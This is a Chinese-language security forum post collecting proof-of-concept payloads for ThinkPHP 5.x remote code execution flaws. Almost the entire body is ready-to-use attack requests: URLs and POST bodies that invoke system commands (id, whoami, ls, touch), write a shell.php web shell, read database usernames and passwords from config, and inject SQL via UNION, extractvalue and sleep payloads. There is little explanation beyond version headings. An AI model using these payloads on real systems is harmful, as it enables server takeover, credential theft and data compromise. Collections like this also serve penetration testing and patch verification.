安全矩阵

 找回密码
 立即注册
搜索
查看: 5021|回复: 0

Thinkphp V5.X 远程代码执行漏洞-POC 集合

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-8-9 20:12:51 | 显示全部楼层 |阅读模式
原文链接:Thinkphp V5.X 远程代码执行漏洞-POC 集合

Thinkphp V5.X 远程代码执行漏洞-POC 集合

Thinkphp 5.0.22

http://192.168.1.1/thinkphp/public/?s=.|thinkconfig/get&name=database.username
http://192.168.1.1/thinkphp/public/?s=.|thinkconfig/get&name=database.password
http://url/to/thinkphp_5.0.22/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
http://url/to/thinkphp_5.0.22/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
Thinkphp 5

http://127.0.0.1/tp5/public/?s=i ... 3E%3C?php%20phpinfo();?%3E&data=1
Thinkphp 5.0.21

http://localhost/thinkphp_5.0.21/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
http://localhost/thinkphp_5.0.21/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
Thinkphp 5.1.*

http://url/to/thinkphp5.1.29/?s=index/thinkRequest/input&filter=phpinfo&data=1
http://url/to/thinkphp5.1.29/?s=index/thinkRequest/input&filter=system&data=cmd
http://url/to/thinkphp5.1.29/?s=index/thinktemplatedriverfile/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
http://url/to/thinkphp5.1.29/?s=index/thinkviewdriverPhp/display&content=%3C?php%20phpinfo();?%3E
http://url/to/thinkphp5.1.29/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
http://url/to/thinkphp5.1.29/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
http://url/to/thinkphp5.1.29/?s=index/thinkContainer/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
http://url/to/thinkphp5.1.29/?s=index/thinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
未知版本

?s=index/thinkmodule/action/param1/${@phpinfo()}
?s=index/thinkModule/Action/Param/${@phpinfo()}
?s=index/think/module/aciton/param1/${@print(THINK_VERSION)}
index.php?s=/home/article/view_recent/name/1'
header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
index.php?s=/home/shopcart/getPricetotal/tag/1%27
index.php?s=/home/shopcart/getpriceNum/id/1%27
index.php?s=/home/user/cut/id/1%27
index.php?s=/home/service/index/id/1%27
index.php?s=/home/pay/chongzhi/orderid/1%27
index.php?s=/home/pay/index/orderid/1%27
index.php?s=/home/order/complete/id/1%27
index.php?s=/home/order/complete/id/1%27
index.php?s=/home/order/detail/id/1%27
index.php?s=/home/order/cancel/id/1%27
index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+
POST /index.php?s=/home/user/checkcode/ HTTP/1.1 Content-Disposition: form-data; name="couponid"1') union select sleep('''+str(sleep_time)+''')#
Thinkphp 5.0.23(完整版)Debug 模式

(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx
Thinkphp 5.0.23(完整版)

(post)public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al
Thinkphp 5.0.10(完整版)

(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system
Thinkphp 5.1.* 和 5.2.* 和 5.0.*

(post)public/index.php (data)c=exec&f=calc.exe&_method=filter
当 Php7 以上无法使用 Assert 的时候用

_method=__construct&method=get&filter[]=think__include_file&server[]=phpinfo&get[]=包含&x=phpinfo();
以上就是Thinkphp V5.X 远程代码执行漏洞-POC整合,希望这篇文章对您有所帮助!
http://www.thinkphpedu.com



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 03:46 , Processed in 0.012333 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表